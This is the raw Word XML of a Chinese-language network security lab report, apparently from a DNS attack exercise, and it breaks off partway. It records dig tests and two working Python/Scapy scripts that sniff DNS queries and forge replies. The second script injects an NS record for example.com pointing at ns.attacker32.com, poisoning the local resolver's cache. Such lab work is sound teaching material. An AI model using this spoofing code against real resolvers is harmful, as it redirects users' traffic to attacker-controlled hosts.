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A2841" w14:textId="34035EB7" w:rsidR="006E4D93" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="006E4D93">
        <w:t>Testing the DNS Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00555698" w14:textId="24FAD6FB" w:rsidR="006E4D93" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在user用户机上dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ns.attacker32.com  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到配置如下与设置一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608DCAAC" w14:textId="46163253" w:rsidR="006E4D93" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560D5873" wp14:editId="75DD7991">
            <wp:extent cx="5274310" cy="2865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7D81" w14:textId="1E6A523F" w:rsidR="006E4D93" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后分别用不同的server去dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C64FFB">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到的结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14461046" w14:textId="781AB5AF" w:rsidR="006E4D93" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B8FADA" wp14:editId="4B635FB9">
            <wp:extent cx="5274310" cy="4089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1B3E" w14:textId="5CFB67CF" w:rsidR="007C4BB9" w:rsidRDefault="00091412">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>桥接模式下正常dig无响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37C816" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1080A8" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052BF823" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290E80DF" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195A42E9" w14:textId="02DB1057" w:rsidR="00C32D2F" w:rsidRPr="007C4BB9" w:rsidRDefault="00B85B8C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASK </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396DEA3" w14:textId="07F12068" w:rsidR="00B85B8C" w:rsidRDefault="006E4D93">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上清除D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874DBC5" w14:textId="667C707C" w:rsidR="007F3B4F" w:rsidRDefault="007F3B4F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19019353" wp14:editId="6C7DA453">
            <wp:extent cx="4496190" cy="5944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415A" w14:textId="462FC027" w:rsidR="007F3B4F" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在未执行攻击程序前，</w:t>
      </w:r>
      <w:r w:rsidR="005D3E65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>桥接模式下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C64FFB">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会超时无响应如test中结果，执行程序伪造包后结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42003C98" w14:textId="078D8260" w:rsidR="007F3B4F" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D754A2" wp14:editId="39CFB9C8">
            <wp:extent cx="5274310" cy="27920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482F" w14:textId="34471CF4" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621CABE8" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FBD2EE" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D79A4C" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05474B67" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B245BAD" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDDCA99" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B225C0" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F0C3F" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip = IP() # Create an IP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D658A07" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.dst = pkt[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D10C6" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.src = pkt[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52295ADD" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp = UDP() # Create a UPD object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FAF86" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.dport=pkt[UDP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D55FB" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.sport=53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E88820" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='1.2.3.4') # Create an aswer record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB1CE7" w14:textId="27C1C230" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, an=Anssec,) # Create a DNS object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B508556" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B180FA8" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D6A96" w14:textId="77777777" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>myFilter = "udp and dst port 53" # Set the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E8EFD" w14:textId="25377E45" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pkt=sniff(iface='br-2d61e239ce80', filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3EBAA" w14:textId="14A4C75B" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1080A56F" w14:textId="5B05E01C" w:rsidR="007C4BB9" w:rsidRDefault="007C4BB9" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B736D4A" w14:textId="70339F8F" w:rsidR="007C4BB9" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换成</w:t>
      </w:r>
      <w:r>
        <w:t>NAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D1E50" w14:textId="0FBFA1C9" w:rsidR="000A710B" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未进行攻击前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AE60CE" w14:textId="5F790F81" w:rsidR="000A710B" w:rsidRPr="007C4BB9" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4254C358" wp14:editId="29A88211">
            <wp:extent cx="5274310" cy="3190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6F62" w14:textId="1A184B3A" w:rsidR="000A710B" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中清除缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C9A60" w14:textId="310AA665" w:rsidR="007C4BB9" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15ABE91E" wp14:editId="7F1AEEF9">
            <wp:extent cx="4038950" cy="4953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3E9F" w14:textId="51D509A4" w:rsidR="000A710B" w:rsidRDefault="000A710B" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DFB50A" w14:textId="062A46AE" w:rsidR="000A710B" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行攻击程序，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8F5EE" w14:textId="1EE634D7" w:rsidR="00521432" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BB60205" wp14:editId="2FCDCB8D">
            <wp:extent cx="5274310" cy="3129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D55B" w14:textId="57F1B156" w:rsidR="00521432" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查看D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D0715" w14:textId="4CF9F5F5" w:rsidR="00521432" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26464286" wp14:editId="784E0CF3">
            <wp:extent cx="5274310" cy="30327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A972" w14:textId="17F76986" w:rsidR="00C12AFA" w:rsidRDefault="00C12AFA" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0997EB70" wp14:editId="13446DAD">
            <wp:extent cx="5274310" cy="14808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EBC1" w14:textId="0ABAF080" w:rsidR="00521432" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭程序测试，结果如下说明已写入缓存中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2000C6" w14:textId="605B0348" w:rsidR="00521432" w:rsidRDefault="00521432" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7325501E" wp14:editId="4693213B">
            <wp:extent cx="5274310" cy="3766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171" w14:textId="129A3B43" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542091B0" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081E129" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A79BAB" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BA452" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABC1C7" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335EBAD" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F1368" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB8422B" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip = IP() # Create an IP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF26BC" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.dst = pkt[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E068F" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.src = pkt[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E9D5A" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp = UDP() # Create a UPD object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8753D9" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.dport=pkt[UDP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8709E" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.sport=pkt[UDP].dport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF52D7F" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='1.2.3.5') # Create an aswer record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF41A6" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E62EFB" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     NSsec1 = DNSRR(rrname='example.com', type='NS',ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A53D6F" w14:textId="2C77BAEC" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E329488" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A', ttl=259200, rdata='10.9.0.153')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578EAA5" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE691F" w14:textId="4DB18DF5" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=1, arcount=1, an=Anssec,ns=NSsec1, ar=Addsec1)# Create a DNS object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3B868" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E64813" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767AFA9" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>myFilter = "udp and dst port 53 "# Set the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCAA70F" w14:textId="77777777" w:rsidR="00880D75" w:rsidRDefault="00880D75" w:rsidP="00880D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
